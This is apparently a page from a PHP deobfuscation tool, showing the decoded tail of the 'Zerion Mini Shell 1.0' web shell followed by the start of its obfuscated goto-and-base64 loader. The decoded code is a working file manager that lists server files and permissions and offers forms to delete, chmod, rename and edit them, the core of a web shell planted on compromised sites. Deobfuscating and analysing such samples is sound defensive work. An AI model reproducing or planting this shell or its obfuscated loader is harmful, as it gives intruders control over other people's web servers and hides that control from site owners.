342 $size = filesize("{$path}/{$file}") / 1024;

343 $size = round($size, 3);

344 if ($size >= 1024) {

345 $size = round($size / 1024, 2) . ' MB';

346 } else {

347 $size .= ' KB';

348 }

349 echo "<tr>\r\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n<td><center>" . $size . "</center></td>\r\n<td><center>";

350 if (is_writable("{$path}/{$file}")) {

351 echo '<font color="green">';

352 } elseif (!is_readable("{$path}/{$file}")) {

353 echo '<font color="red">';

354 }

355 echo perms("{$path}/{$file}");

356 if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {

357 echo '</font>';

358 }

359 echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";

360 }

361 echo '</table>

362 </div>';

363 }

364 echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center>

365 </BODY>

366 </HTML>';

367 function perms($file)

368 {

369 $perms = fileperms($file);

370 if (($perms & 0xc000) == 0xc000) {

371 $info = 's';

372 } elseif (($perms & 0xa000) == 0xa000) {

373 $info = 'l';

374 } elseif (($perms & 0x8000) == 0x8000) {

375 $info = '-';

376 } elseif (($perms & 0x6000) == 0x6000) {

377 $info = 'b';

378 } elseif (($perms & 0x4000) == 0x4000) {

379 $info = 'd';

380 } elseif (($perms & 0x2000) == 0x2000) {

381 $info = 'c';

382 } elseif (($perms & 0x1000) == 0x1000) {

383 $info = 'p';

384 } else {

385 $info = 'u';

386 }

387 $info .= $perms & 0x100 ? 'r' : '-';

388 $info .= $perms & 0x80 ? 'w' : '-';

389 $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');

390 $info .= $perms & 0x20 ? 'r' : '-';

391 $info .= $perms & 0x10 ? 'w' : '-';

392 $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');

393 $info .= $perms & 0x4 ? 'r' : '-';

394 $info .= $perms & 0x2 ? 'w' : '-';

395 $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');

396 return $info;

397 }

398 }), $L8CRgr[1]);

399 die;

PHP deobfuscation, decryption, reconstruction tool

<?php goto MLo4U; Zgg0F: goto ou53D; goto xVtRo; KzQK3: goto XrPWy; goto F9638; hhI_i: goto l_qCH; goto s3zF4; xVtRo: l_qCH: goto VzL3S; fLpYd: $L86Rgr = explode(base64_decode("\120\x7a\64\75"), file_get_contents(FILE)); goto RYYVU; oc6zE: $L7CRgr = "\65\x36\63\x64\x35\62\142\x39\65\63\x31\x3...

Obfuscated php code

Decoded(de-Obfuscated) php code